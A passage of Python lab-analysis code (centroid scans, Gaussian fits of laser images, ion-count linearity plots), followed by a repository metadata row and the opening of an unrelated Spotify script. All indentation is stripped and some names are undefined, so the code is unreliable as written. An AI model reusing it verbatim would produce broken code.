plt.ylabel('y Pixel')
plt.axis([bounds[0]-2,bounds[1]+2,bounds[2]-2,bounds[3]+2])
ut.rect(bounds)
if xylim!='default':
plt.axis(xylim)
if zscale!='default':
plt.clim(zscale)
plt.show()
if savepath!=False:
ut.create_dir(savepath)
framestr=str(frame).zfill(4)
plt.savefig(savepath+str(date)+'_run'+str(filename)+'_'+framestr+'_cent_area.png')
j+=1
plt.figure('cent_all')
plt.clf()
# Plot each centroid position
plt.figure('cent_all')
plt.plot(cent[:,0],cent[:,1],'bo')
plt.title('Centroid for All Frames in '+run)
plt.xlabel('pixel')
plt.ylabel('pixel')
if annotate==True:
for i in frames-1:
plt.annotate(str(i+1),xy=(cent[i,0],cent[i,1]),xytext=(5,5),textcoords='offset points')
if savepath!=False:
plt.savefig(savepath+str(date)+'_run'+str(filename)+'centroid_all.png')
if stats==True:
# Calculate Average and Standard Deviation
cent_ave=np.mean(cent,axis=0)
cent_std=np.std(cent,axis=0)
# Plot average position
plt.figure('cent_all')
plt.plot(cent_ave[0],cent_ave[1],'ro',markersize=8)
ut.textbox('Average Centroid: ('+str(round(cent_ave[0],2))+','+str(round(cent_ave[1],2))+')\nCentroid StDev: ('+str(round(cent_std[0],2))+','+str(round(cent_std[1],2))+')',[.05,.95])
if savepath!=False:
plt.savefig(savepath+'centroid/'+str(date)+'_run'+str(filename)+'centroid_all.png')
ut.rem('cent_all','text',0)
plt.axis([cent_ave[0]-3*cent_std[0],cent_ave[0]+3*cent_std[0],cent_ave[1]-3*cent_std[1],cent_ave[1]+3*cent_std[1]])
ut.textbox('Average Centroid: ('+str(round(cent_ave[0],2))+','+str(round(cent_ave[1],2))+')\nCentroid StDev: ('+str(round(cent_std[0],2))+','+str(round(cent_std[1],2))+')',[.05,.95])
if savepath!=False:
plt.savefig(savepath+str(date)+'_run'+str(filename)+'centroid_all_zoom.png')
return cent,cent_ave,cent_std
return cent
#------------------------------------------------------------------------------------------
# Function to integrate area in 0-order image
def centroid_scan(filename,center,width,skip,numsteps,**kwargs):
# Define keyword arguments
colmap=kwargs.get('cmap','jet')
frames=kwargs.get('frames','all')
bgfile=kwargs.get('bgfile',False)
plt_rect=kwargs.get('plt_rect',True)
savepath=kwargs.get('savepath',False)
overlay=kwargs.get('overlay',False)
scale=kwargs.get('bg_scale',1.)
shift=kwargs.get('bg_shift',[0,0])
bgframe=kwargs.get('bg_frame','ave')
xylim=kwargs.get('axis','default')
zscale=kwargs.get('z_scale','default')
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
import os
if savepath!=False:
ut.create_dir(savepath+'centroid/')
ut.create_dir(savepath+'centroid/im/')
if bgfile==False:
# Import data and remove cosmics with image_remove_cosmics
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename)
# Import data and remove cosmics with image_sub
else:
if frames!='all':
frames=np.array(frames)-1
x,y,pix,x_max,y_max,N,run=im_sub(filename,bgfile,bg_scale=scale,bg_shift=shift,bg_frame=bgframe,frames=frames)
if frames=='all':
frames=range(1,N+1)
frames=np.array(frames)
# Make a box centered at some pixel to integrate
bounds=np.zeros((N,4),dtype=int)
bounds[0,:]=[center[0]-width[0],center[0]+width[0],center[1]-width[1],center[1]+width[1]]
stepsize=[1,1]
xinc,xdir,ymoved=0,1,0
for i in range(N):
if i==0:
continue
if xinc==numsteps[0]-1:
bounds[i,:]=[bounds[i-1,0],bounds[i-1,1],bounds[i-1,2]+stepsize[1],bounds[i-1,3]+stepsize[1]]
ymoved=1
xdir=xdir*-1
if xinc<numsteps[0]-1:
if xinc % skip[0] == 0:
bounds[i,:]=[bounds[i-1,0]+xdir*stepsize[0],bounds[i-1,1]+xdir*stepsize[0],bounds[i-1,2],bounds[i-1,3]]
else:
bounds[i,:]=bounds[i-1,:]
xinc+=1
if ymoved==1:
ymoved,xinc=0,0
# Find the Centroid
cent=[]
for i in frames-1:
aoi=pix[i,bounds[i,2]:bounds[i,3]+1,bounds[i,0]:bounds[i,1]+1]
centx,centy=[],[]
for j in range(bounds[i,2],bounds[i,3]+1):
for k in range(bounds[i,0],bounds[i,1]+1):
centx.append(aoi[j-bounds[i,2],k-bounds[i,0]]*(k+1))
centy.append(aoi[j-bounds[i,2],k-bounds[i,0]]*(j+1))
cent.append(((1./np.sum(aoi))*np.sum(centx),(1./np.sum(aoi))*np.sum(centy)))
cent=np.array(cent)
# Plot the frames desired
if plt_rect==True:
for frame in frames:
plt.figure('int_area')
plt.clf()
im=plt.imshow(pix[(frame-1),:,:],cmap=colmap,interpolation='nearest')
plt.plot(cent[frame-1][0]-1,cent[frame-1][1]-1,'ko',markersize=5)
plt.colorbar(im,orientation='vertical')
plt.title(run+': frame '+repr(frame))
plt.xlabel('x Pixel')
plt.ylabel('y Pixel')
plt.axis([x[0],x[-1],y[0],y[-1]])
ut.rect(bounds[frame-1,:])
if xylim!='default':
plt.axis(xylim)
if zscale!='default':
plt.clim(zscale)
plt.show()
if savepath!=False:
ut.create_dir(savepath)
if frame<=9:
framestr='00'+str(frame)
if 10<=frame<=99:
framestr='0'+str(frame)
if 100<=frame:
framestr=str(frame)
plt.savefig(savepath+'/centroid/im/'+str(date)+'_run'+str(filename)+'_'+framestr+'_cent_area.png')
plt.figure('cent_all')
plt.clf()
# Plot each centroid position
centxlist,centylist=[],[]
for i in range(len(cent)):
plt.figure('cent_solo')
plt.clf()
plt.plot(cent[i][0],cent[i][1],'ro')
plt.xlabel('x pixel')
plt.ylabel('y pixel')
if i+1<=9:
framestr='00'+str(i+1)
if 10<=i+1<=99:
framestr='0'+str(i+1)
if 100<=i+1:
framestr=str(i+1)
plt.title('Centroid Movement '+run+'_fr'+framestr)
plt.axis([1,np.shape(pix)[2]+1,1,np.shape(pix)[1]+1])
plt.ylabel('y pixel')
plt.xlabel('x pixel')
if savepath!=False:
plt.savefig(savepath+'centroid/centroid'+str(date)+'_run'+str(filename)+'_fr'+framestr+'.png')
# Plot all centroid positions
plt.figure('cent_all')
plt.plot(cent[i][0],cent[i][1],'ro')
plt.ylabel('y pixel')
plt.xlabel('x pixel')
if savepath!=False:
plt.savefig(savepath+'centroid/'+str(date)+'_run'+str(filename)+'centroid_all.png')
return cent
#------------------------------------------------------------------------------------------
# Display the scan pattern and contour for bleaching
def scan_setup(shape_s,spacing_s,width_s,shape_b,spacing_b,width_b,wtype,**kwargs):
# Define keyword arguments
contours=kwargs.get('contours',[.9])
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
import os
import funk
# Make scan and bleach arrays array
scan_array=funk.gaussarray(shape_s,spacing_s,width_s[0],width_s[1])
bleach_array=funk.gaussarray(shape_b,spacing_b,width_b[0],width_b[1])
# Plot the scan array and the contour for bleaching
plt.figure('scan_setup')
plt.clf()
extent_s=[-(shape_s[0]-1)*spacing_s,(shape_s[0]-1)*spacing_s,-(shape_s[1]-1)*spacing_s,(shape_s[1]-1)*spacing_s]
extent_b=[-(shape_b[0]-1)*spacing_b,(shape_b[0]-1)*spacing_b,-(shape_b[1]-1)*spacing_b,(shape_b[1]-1)*spacing_b]
aspect_ratio_s=float(shape_s[0])/shape_s[1]
aspect_ratio_b=float(shape_b[0])/shape_b[1]
plt.imshow(scan_array,extent=extent_s,aspect=aspect_ratio_s)
plt.colorbar(orientation='vertical')
plt.xlabel('x position (micron)')
plt.ylabel('y position (micron)')
# Plot contour(s)
contours_real=np.array(contours)*np.amax(bleach_array)
cs=plt.contour(bleach_array,levels=contours_real,colors='firebrick',linewidths=3,linestyles=['dashed'],extent=extent_b,aspect=aspect_ratio_b)
fmt={}
for i,j in zip(cs.levels,contours):
fmt[i]=str(j)
plt.clabel(cs,inline=1,fmt=fmt,fontsize=10)
plt.axis(extent_s)
#offset=start_b-start_s
#ut.textbox('Bleach Start Offset: ('+str(offset[0])+','+str(offset[1])+') micron',[.05,.98])
#------------------------------------------------------------------------------------------
# Display the bleaching expected
def bleach_setup(shape,spacing,width,**kwargs):
# Define keyword arguments
contours=kwargs.get('contours',[.9])
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
import os
import funk
# Make scan and bleach arrays array
bleach_array,start=funk.gaussarray(shape,spacing,width[0],width[1],start=True)
# Plot the scan array and the contour for bleaching
plt.figure('scan_setup')
plt.clf()
extent_b=[-(shape[0]-1)*spacing,(shape[0]-1)*spacing,-(shape[1]-1)*spacing,(shape[1]-1)*spacing]
aspect_ratio_b=float(shape[0])/shape[1]
plt.imshow(bleach_array,extent=extent_b,aspect=aspect_ratio_b)
plt.colorbar(orientation='vertical')
plt.xlabel('x position (micron)')
plt.ylabel('y position (micron)')
# Plot contour(s)
contours_real=np.array(contours)*np.amax(bleach_array)
cs=plt.contour(bleach_array,levels=contours_real,colors='firebrick',linewidths=3,linestyles=['dashed'],extent=extent_b,aspect=aspect_ratio_b)
fmt={}
for i,j in zip(cs.levels,contours):
fmt[i]=str(j)
plt.clabel(cs,inline=1,fmt=fmt,fontsize=10)
plt.axis(extent_b)
#------------------------------------------------------------------------------------------
def gauss_center(data,xfit,yfit,xint,yint,p0,**kwargs):
savepath=kwargs.get('savepath',False)
run=kwargs.get('run',0)
fig=kwargs.get('fig','')
highlander=kwargs.get('only','both')
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
import os
if savepath!=False:
ut.create_dir(savepath+'gauss_prof/')
def gauss(x,amp,cen,width):
return amp*np.exp(-2*np.square(x-cen)/(np.square(width)))
# Integrate the xstrip and ystrip to get 1D arrays
yprof=np.vstack((np.arange(yfit[0],yfit[1]+1),np.sum(data[yfit[0]-1:yfit[1],xint[0]-1:xint[1]],axis=1)))
xprof=np.vstack((np.arange(xfit[0],xfit[1]+1),np.sum(data[yint[0]-1:yint[1],xfit[0]-1:xfit[1]],axis=0)))
# Fit 1D gaussian to each cross section
if highlander!='y':
xparam=ut.fitter1d(gauss,xprof,[p0[0],p0[1],p0[3]],fig='xprof'+fig)
ut.textbox('Center: '+str(round(xparam[1],2))+'\nWidth: '+str(round(xparam[2],2)),[.05,.95])
if savepath!=False:
plt.savefig(savepath+'gauss_prof/run'+str(run)+'xprof.png')
if highlander!='x':
yparam=ut.fitter1d(gauss,yprof,[p0[0],p0[2],p0[4]],fig='yprof'+fig)
ut.textbox('Center: '+str(round(yparam[1],2))+'\nWidth: '+str(round(yparam[2],2)),[.05,.95])
if savepath!=False:
plt.savefig(savepath+'gauss_prof/run'+str(run)+'yprof.png')
if highlander=='x':
return xparam[1]
if highlander=='y':
return yparam[1]
return xparam[1],yparam[1]
#------------------------------------------------------------------------------------------
def center_find(filename,fitbnds,**kwargs):
# Define keyword arguments
colmap=kwargs.get('cmap','jet')
frames=kwargs.get('frames','all')
store=kwargs.get('store',False)
savepath=kwargs.get('savepath',False)
units=kwargs.get('units','pixel')
speed=kwargs.get('speed','slow')
fit=kwargs.get('fit','gauss')
plot_each=kwargs.get('plot_each',True)
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import os
import utility as ut
import lv_analysis as lv
from lmfit import minimize,Parameters,Parameter,Model
subdir=fit+'_center/'
if savepath!=False:
ut.rm_dir(savepath+subdir)
ut.create_dir(savepath+subdir)
# Import data and remove cosmics with image_remove_cosmics
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed=speed)
# Slice data for just fit bounds
pixslice=pix[:,fitbnds[2]:fitbnds[3]+1,fitbnds[0]:fitbnds[1]+1]
x,y=np.arange(fitbnds[0],fitbnds[1]+1),np.arange(fitbnds[2],fitbnds[3]+1)
if frames=='all':
frames=range(1,N+1)
# Define 2d gaussian
def gauss2d_flat(x,y,amp,xcenter,ycenter,xwidth,ywidth): # This ends up as f(y,x)
my,mx=np.meshgrid(x,y)
xwidth,ywidth=xwidth/2.,ywidth/2.
return np.ravel(amp*np.exp(-2*(np.square(mx-ycenter)/(np.square(ywidth))))*np.exp(-2*(np.square(my-xcenter))/(np.square(xwidth))))
param_all,frames_fit=[],[]
p0=[500,np.mean([fitbnds[0],fitbnds[1]]),np.mean([fitbnds[2],fitbnds[3]]),2,2]
p_0s=['amp','xcenter','ycenter','xwidth','ywidth']
for frame in frames:
f=frame-1
data=pixslice[f,:,:]
if np.amax(data)>=3.5*np.mean(data):
if fit=='gauss':
# Define x,y grid and p_0 names
func_model=Model(gauss2d_flat,independent_vars=['x','y'],param_names=p_0s)
result=func_model.fit(np.ravel(data),x=x,y=y,amp=p0[0],xcenter=p0[1],ycenter=p0[2],xwidth=p0[3],ywidth=p0[4],verbose=False)
param_all.append([result.best_values['xcenter'],result.best_values['ycenter']+1])
frames_fit.append(frame)
if fit=='centroid':
# Find the Centroid
bounds=np.array(fitbnds)-1
centx,centy=[],[]
for j in range(bounds[2],bounds[3]+1):
for k in range(bounds[0],bounds[1]+1):
centx.append(pix[f,j,k]*(k+1))
centy.append(pix[f,j,k]*(j+1))
param_all.append(((1./np.sum(pix[f,bounds[2]:bounds[3]+1,bounds[0]:bounds[1]+1]))*np.sum(centx),(1./np.sum(pix[f,bounds[2]:bounds[3]+1,bounds[0]:bounds[1]+1]))*np.sum(centy)))
#centx,centy=[],[]
#for l in range(fitbnds[2]-1,fitbnds[3]):
#for k in range(fitbnds[0]-1,fitbnds[1]):
#centx.append(pix[f,l,k]*(k+1))
#centy.append(pix[f,l,k]*(l+1))
#param_all.append([(1./np.sum(data))*np.sum(centx),(1./np.sum(data))*np.sum(centy)])
frames_fit.append(frame)
param_all=np.array(param_all)
meanpos=np.mean(param_all,axis=0)
if units=='micron':
param_all=5*param_all
# Plot the frames desired
if plot_each==True:
for j in range(np.shape(param_all)[0]):
plt.figure(fit+'_fit')
plt.clf()
im=plt.imshow(pix[frames_fit[j]-1,:,:],cmap=colmap,interpolation='nearest')
plt.plot(param_all[j,0]-1,param_all[j,1]-1,'ko',markersize=4)
plt.colorbar(im,orientation='vertical')
plt.title(run+': frame '+repr(frames_fit[j]))
if units=='pixel':
plt.xlabel('x Pixel')
plt.ylabel('y Pixel')
plt.axis([fitbnds[0],fitbnds[1],fitbnds[2],fitbnds[3]])
if units=='micron':
plt.xlabel('x (micron)')
plt.ylabel('y (micron)')
plt.axis([fitbnds[0]*5,fitbnds[1]*5,fitbnds[2]*5,fitbnds[3]*5])
ut.textbox('('+str(round(param_all[j,0],1))+','+str(round(param_all[j,1],1))+')',[.05,.95])
plt.show()
if savepath!=False:
plt.savefig(savepath+subdir+str(date)+'_run'+str(filename)+'_'+str(frames_fit[j]).zfill(3)+'_'+fit+'_center.png')
# Plot just the centers
plt.figure('all_'+fit+'_centers')
plt.clf()
plt.plot(param_all[:,0],param_all[:,1],'bo')
plt.title(str(date)+' run'+str(filename)+' Center for All Frames')
if units=='pixel':
plt.xlabel('x Pixel')
plt.ylabel('y Pixel')
#plt.axis([meanpos[0]-3,meanpos[0]+3,meanpos[1]-3,meanpos[1]-3])
if units=='micron':
plt.xlabel('x (micron)')
plt.ylabel('y (micron)')
plt.axis([fitbnds[0]*5,fitbnds[1]*5,fitbnds[2]*5,fitbnds[3]*5])
#ut.textbox('Fit Bounds: '+repr(fitbnds),[.05,.95])
if savepath!=False:
plt.savefig(savepath+subdir+str(date)+'_run'+str(filename)+'_'+fit+'_center_all.png')
ut.save(np.transpose(param_all),['x pixel','ypixel'],savepath+subdir+str(date)+'_run'+str(filename)+'_'+fit+'_center_all.txt')
return param_all,frames_fit
#------------------------------------------------------------------------------------------
# create linearity plots for ion deposits
def linearity(l_area,T_R,**kwargs):
xwidth=kwargs.get('xwidth',3)
ywidth=kwargs.get('ywidth',3)
savepath=kwargs.get('savepath',False)
A_obs=kwargs.get('A_obs',8.6)
axis=kwargs.get('axis','default')
bndfind=kwargs.get('chgbnds','auto')
vib=kwargs.get('vib_shutter',True)
int_area=kwargs.get('int_area','manual')
cutoff=kwargs.get('cutoff',5.)
bndtype=kwargs.get('boundtype','edge')
fit0=kwargs.get('fit0',True)
charge=kwargs.get('charge','cup')
drops=kwargs.get('runs2skip',[])
ionlim=kwargs.get('ion_limit','all')
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import os
import utility as ut
import lv_analysis as lv
import gen_reader as gr
import scope_cal as scp
import scipy.special as sp
if savepath!=False:
ut.create_dir(savepath)
savescope=savepath+'scope/'
ut.create_dir(savescope)
else:
savescope=savepath
# make l_area the edges of integral area
if bndtype=='center':
l_area=[l_area[0]-.5*l_area[2],l_area[0]+.5*l_area[2],l_area[1]-.5*l_area[3],l_area[1]+.5*l_area[3]]
# import rundata.csv to set up lists
runlist,lvlist,scplist,pulselist=ut.data_lists(date)
# be able to ignore runs
drops_i=[]
for i in drops:
drops_i.append(np.where(runlist==i)[0][0])
runlist,lvlist,scplist,pulselist=np.delete(runlist,drops_i),np.delete(lvlist,drops_i),np.delete(scplist,drops_i,axis=1),np.delete(pulselist,drops_i)
# calculate charge correction for each pulse
pulsecorr=.802*sp.erf(.007*pulselist)
# calculate charge/pulse for cup3 with correction
fC=pulsecorr*scp.pulse_charge_lin(scplist,null_pulse,savepath=savescope,cutoff=7.,chan=3,bounds=bndfind)
# integrate signal,scale by mW*s and calculate number of ions
k=0
ions,ints,labels,xe,zp,energy,pos=[],[],[],[],[],[],[]
for i in runlist:
labels.append('run'+str(i))
# Get laser energy (power * exposure time)
if vib==True:
energy.append(1000*lv.lv_energy(i,T_R=T_R)[0])
if vib=='old':
energy.append(np.mean(lv.lv_pow(lvlist[np.where(runlist==i)[0][0]],T_R=T_R))*np.mean(lv.lv_time(lvlist[np.where(runlist==i)[0][0]])))
# old way of calculating energy
if vib==False:
energy.append(1E3)
# Do the integral
if int_area=='auto':
# Find center of laser
param,cov,fr=gauss2d_fit(i,l_area,savepath=savepath)
pos.append(param[0,:]+1)
if savepath!=False:
integral=im_int_0(i,[param[0,0],param[0,1],xwidth,ywidth],boundtype='center',savepath=savepath+'ints/',overlay=True,axis=l_area)
if savepath==False:
integral=im_int_0(i,[param[0,0],param[0,1],xwidth,ywidth],boundtype='center',overlay=True,axis=l_area)
if int_area=='manual':
pos.append([np.mean(l_area[:2]),np.mean(l_area[2:])])
if savepath!=False:
integral=im_int_0(i,l_area,boundtype='edge',savepath=savepath+'ints/',overlay=True,axis=[l_area[0]-5,l_area[1]+5,l_area[2]-5,l_area[3]+5])
if savepath==False:
integral=im_int_0(i,l_area,boundtype='edge',overlay=True,axis=[l_area[0]-5,l_area[1]+5,l_area[2]-5,l_area[3]+5])
xwidth,ywidth=l_area[1]-l_area[0],l_area[3]-l_area[2]
ints.append(integral[0])
# Find number of ions from pulse data
if pulselist[k]==-1:
ions.append(0.)
xe.append(k)
if pulselist[k]==0:
ions.append(0.)
zp.append(k)
if pulselist[k] not in [0,-1]:
ions.append(.8*pulselist[k]*(fC[1,k]/1.602E-4)*(A_obs/(np.pi*np.square(1.4E3)))*.5)
k+=1
ions=np.array(ions)
ints=np.array(ints)/np.array(energy)
pos=np.array(pos)
# option to fit only lower ion runs
low=[]
if ionlim!='all':
for i in range(len(ions)):
if ions[i]<=ionlim:
low.append(i)
ions,ints,pos,runlist,pulselist,fC=np.take(ions,low),np.take(ints,low),np.take(pos,low,axis=0),np.take(runlist,low),np.take(pulselist,low),np.take(fC,low)
# Re-assign indicies to xe and zero-pulse runs
xe,zp=[],[]
for k in range(len(pulselist)):
if pulselist[k]==-1:
xe.append(k)
if pulselist[k]==0:
zp.append(k)
# Subtract average of surrounding Xe BG runs from pulse runs
ints_sub=np.zeros(np.shape(ints))
for i in range(len(runlist)):
if pulselist[i]!=-1:
for j in range(len(runlist)-(i+1)):
if pulselist[i+(j+1)]==-1:
xe_after=ints[i+(j+1)]
break
for k in range(i):
if pulselist[i-(k+1)]==-1:
xe_before=ints[i-(k+1)]
break
ints_sub[i]=ints[i]-np.mean([xe_before,xe_after])
ints_sub_0=np.take(ints_sub,zp)
ions_sub_0=np.take(ions,zp)
# Save the data in ascii
if savepath!=False:
ut.save(np.vstack((runlist,ions,ints,fC,pos[:,0],pos[:,1])),['run','ions','counts','fC/pulse','xpos','ypos'],savepath+'rundata.txt')
ut.save(np.delete(np.vstack((runlist,ions,ints_sub,fC,pos[:,0],pos[:,1])),xe,axis=1),['run','ions','counts(sub)','fC/pulse','xpos','ypos'],savepath+'rundata_sub.txt')
ut.save(np.take(np.vstack((runlist,ions,ints,fC,pos[:,0],pos[:,1])),xe,axis=1),['run','ions','counts','fC/pulse','xpos','ypos'],savepath+'bg_data.txt')
#Fit line to data
if fit0==False:
params_line=ut.fitter1d(funk.poly,np.vstack((np.delete(ions,xe),np.delete(ints_sub,xe))),[0,200])
fitx=np.linspace(-1,1.1*np.amax(np.delete(ions,xe)),20)
fit=funk.poly(np.linspace(-1,1.1*np.amax(np.delete(ions,xe)),20),params_line[0],params_line[1])
if fit0==True:
params_line=ut.fitter1d(funk.line0,np.vstack((np.delete(ions,xe),np.delete(ints_sub,xe))),[200])
fitx=np.linspace(-1,1.1*np.amax(np.delete(ions,xe)),20)
fit=funk.line0(np.linspace(-1,1.1*np.amax(np.delete(ions,xe)),20),params_line[0])
# Make the Linearity Plot
plt.figure('linearity')
plt.clf()
plt.plot(np.delete(ions,xe),np.delete(ints,xe),'bo')
plt.plot(np.take(ions,xe),np.take(ints,xe),'ro')
plt.plot(np.take(ions,zp),np.take(ints,zp),'go')
plt.plot(fitx,fit+np.mean(np.take(ints,xe)),'r--')
plt.xlabel('Number of Ions in Laser Region')
plt.title(str(date)+ ' Linearity Plot',fontsize=12)
plt.ylabel('Integrated Counts per mW in First Frame ('+str(xwidth)+'x'+str(ywidth)+' Region)')
plt.legend(['Ba Runs','Xe Runs','0-pulse Runs'],numpoints=1,fontsize=12,loc=2)
for label,x,y in zip(labels,ions,ints):
plt.annotate(label,xy=(x,y),xytext=(0,5),textcoords='offset points',ha = 'left',va ='bottom')
plt.xlim(-1,1.25*np.amax(ions))
if np.amax(ints)>=1E3:
ut.sci()
plt.show()
if savepath!=False:
plt.savefig(savepath+'linearity_plot.png')
if ionlim=='all':
plt.axis([-1,10,0,1.25*fit[ut.bound_finder(fitx,[10])[0]]+np.mean(np.take(ints,xe))])
if savepath!=False:
plt.savefig(savepath+'linearity_plot_small.png')
# Make the Linearity Plot for Subtracted Data
plt.figure('linearity sub')
plt.clf()
plt.plot(np.delete(ions,xe),np.delete(ints_sub,xe),'bo')
plt.plot(ions_sub_0,ints_sub_0,'go')
plt.plot(fitx,fit,'r--')
plt.xlabel('Number of Ions in Laser Region')
plt.title(str(date)+ ' Linearity Plot Subtracted',fontsize=12)
plt.ylabel('Integrated Counts per mW in First Frame ('+str(xwidth)+'x'+str(ywidth)+' Region)')
ut.textbox('Counts/Ion: '+str(round(params_line[0],2)),[.05,.95])
for label,x,y in zip(np.delete(labels,xe),np.delete(ions,xe),np.delete(ints_sub,xe)):
plt.annotate(label,xy=(x,y),xytext=(5,5),textcoords='offset points',ha = 'right',va ='bottom')
ut.zero(bounds=[-1,1.2*np.amax(ions)])
if np.amax(ints_sub)>=1E3:
ut.sci()
plt.show()
if ionlim=='all':
plt.axis([-1,10,-200,1.25*fit[ut.bound_finder(fitx,[10])[0]]])
if savepath!=False:
plt.savefig(savepath+'linearity_plot_sub_small.png')
plt.axis([-1,1.05*np.amax(ions),-200,1.25*np.amax(ints_sub)])
if savepath!=False:
plt.savefig(savepath+'linearity_plot_sub.png')
# Plot the Xe runs and statistics
xe_ave,xe_std=np.mean(np.take(ints,xe)),np.std(np.take(ints,xe))
plt.figure('xe runs')
plt.clf()
plt.plot(range(1,len(xe)+1),np.take(ints,xe),'bo')
plt.xlim(0,len(xe)+2)
ut.hline(xe_ave,legend=False)
plt.xlabel('Xe Run')
plt.ylabel('Integrated Counts per mW in First Frame ('+str(xwidth)+'x'+str(ywidth)+' Region)')
plt.title(str(date)+' Counts per mW of Xe-only runs')
for label,x,y in zip(np.take(labels,xe),range(1,len(xe)+1),np.take(ints,xe)):
plt.annotate(label,xy=(x,y),xytext=(5,5),textcoords='offset points',ha = 'right',va ='bottom')
ut.textbox('Average: '+str(round(xe_ave,1))+'\nStDev: '+str(round(xe_std,1)),[.05,.95])
if savepath!=False:
plt.savefig(savepath+'xe_only_runs.png')
return ions,ints,ints_sub,xe,zp,runlist
#------------------------------------------------------------------------------------------
def laser_overlay(positions,w,**kwargs):
store=kwargs.get('store',True)
fit_gauss=kwargs.get('fit_gauss',False)
savepath=kwargs.get('savepath',False)
savefile=kwargs.get('savefile',False)
import matplotlib as mpl
import numpy as np
import utility as ut
import funk
mean_pos=[np.mean(positions[:,0]),np.mean(positions[:,1])]
range_pos=[np.absolute(np.amax(positions[:,0])-np.amin(positions[:,0])),np.absolute(np.amax(positions[:,1])-np.amin(positions[:,1]))]
x=np.linspace(np.amin(positions[:,0])-1.5*w[0],np.amax(positions[:,0])+1.5*w[0],500)
y=np.linspace(np.amin(positions[:,1])-1.5*w[1],np.amax(positions[:,1])+1.5*w[1],500)
laser_cov=np.zeros((500,500))
for i in range(np.shape(positions)[0]):
laser_cov+=funk.gauss2dw(x,y,1.,positions[i,0],positions[i,1],w[0],w[1])
if fit_gauss==True:
params=ut.gaussfit2d(laser_cov,x,y,[10,mean_pos[0],mean_pos[1],w[0],w[1]])
area=ut.e_fold_area(laser_cov,x,y)
plt.figure('laser')
plt.clf()
plt.imshow(np.flipud(laser_cov),extent=[x[0],x[-1],y[0],y[-1]])
plt.colorbar(orientation='vertical')
plt.xlabel('x (micron)')
plt.ylabel('y (micron)')
ut.textbox('w_x: '+str(w[0])+'micron\nw_y: '+str(w[1])+'micron\nArea: '+str(round(area,2))+'sq.micron',[.05,.25],fontsize=10)
plt.show()
if savepath!=False:
ut.create_dir(savepath)
plt.savefig(savepath+'laser_area.png')
if savefile!=False:
plt.savefig(savefile)
if store==True:
if fit_gauss==True:
return laser_cov,area,params
if fit_gauss==False:
return laser_cov,area
#------------------------------------------------------------------------------------------
def gauss2d_fit(filename,fitbnds,**kwargs):
frames=kwargs.get('frames','all')
speed=kwargs.get('speed','slow')
import matplotlib as mpl
import numpy as np
import utility as ut
import funk
from lmfit import minimize,Parameters,Parameter,Model
# Import data and remove cosmics with image_remove_cosmics
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed=speed)
# Slice data for just fit bounds
data=pix[:,fitbnds[2]:fitbnds[3]+1,fitbnds[0]:fitbnds[1]+1]
x,y=np.arange(fitbnds[0],fitbnds[1]+1),np.arange(fitbnds[2],fitbnds[3]+1)
if frames=='all':
frames=range(1,N+1)
# Define 2d gaussian
def gauss2d_flat(x,y,amp,xcenter,ycenter,xwidth,ywidth): # This ends up as f(y,x)
my,mx=np.meshgrid(x,y)
xwidth,ywidth=xwidth/2.,ywidth/2.
return np.ravel(amp*np.exp(-2*(np.square(mx-ycenter)/(np.square(ywidth))))*np.exp(-2*(np.square(my-xcenter))/(np.square(xwidth))))
param_all,frames_fit=[],[]
p0=[500,np.mean([fitbnds[0],fitbnds[1]]),np.mean([fitbnds[2],fitbnds[3]]),2,2]
p_0s=['amp','xcenter','ycenter','xwidth','ywidth']
# Define x,y grid and p_0 names
for i in frames:
func_model=Model(gauss2d_flat,independent_vars=['x','y'],param_names=p_0s)
result=func_model.fit(np.ravel(data),x=x,y=y,amp=p0[0],xcenter=p0[1],ycenter=p0[2],xwidth=p0[3],ywidth=p0[4],verbose=False)
param_all.append([result.best_values['amp'],result.best_values['xcenter']+1,result.best_values['ycenter']+1,result.best_values['xwidth'],result.best_values['ywidth']])
param_all=np.array(param_all)
return param_all
#------------------------------------------------------------------------------------------
def scan_corr(scan1,scan2,rng):
import numpy as np
import matplotlib as mpl
import scipy.optimize as opt
corr,shift=[],[]
for i in np.arange(-rng[0],rng[0]+1):
for j in np.arange(-rng[1],rng[1]+1):
corr.append(np.sum((scan1-np.mean(scan1))*(ut.int_shift(scan2,i,j,val=0)-np.mean(ut.int_shift(scan2,i,j,val=0))))/((np.shape(scan1)[0]-abs(i))*(np.shape(scan1)[1]-abs(j))))
shift.append([i,j])
corr=np.transpose(np.array(corr).reshape(2*rng[1]+1,2*rng[0]+1))
plt.figure('correlation')
plt.imshow(corr,interpolation='nearest',origin='lower',extent=[-rng[0],rng[0],-rng[1],rng[1]])
return corr,shift
#------------------------------------------------------------------------------------------
def scan_chi2(scan1,scan2,rng):
import numpy as np
import matplotlib as mpl
import scipy.optimize as opt
corr,shift=[],[]
for i in np.arange(-rng[0],rng[0]+1):
for j in np.arange(-rng[1],rng[1]+1):
corr.append(np.sum(np.square(scan1-ut.int_shift(scan2,i,j,val=0)))/((np.shape(scan1)[0]-abs(i))*(np.shape(scan1)[1]-abs(j))))
shift.append([i,j])
corr=np.transpose(np.array(corr).reshape(2*rng[1]+1,2*rng[0]+1))
plt.figure('correlation')
plt.imshow(corr,interpolation='nearest',origin='lower',extent=[-rng[0],rng[0],-rng[1],rng[1]])
return corr,shift
| [
"chrischambers89@gmail.com"
] | chrischambers89@gmail.com |
96c23484a0920d0be9ee54cdb89c588c505d99fb | 61158f7d7f20accc4e960cf90691116b192b956c | /main.py | b8d6b8ec9f65c46a1c136a47733502bdcb81345a | [] | no_license | asdfMaciej/spotify-analytics | c110ac9e107753c010511a2ebb1ce212eed8c798 | c62e6cb2b3e23f112c7cc58f02743779911ba815 | refs/heads/master | 2021-01-21T17:29:18.496087 | 2017-05-21T13:28:36 | 2017-05-21T13:28:36 | 91,955,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,911 | py | import requests, json, sqlite3
from pprint import pprint
class Playlist:
def __init__(self, name: str, id: str, owner: str):
self.name = name
self.id = id
self.owner = owner
def __str__(self):
return self.id + " - " + self.owner + " - " + self.name
class User:
def __init__(self, display_name: str, id: str):
self.display_name = display_name
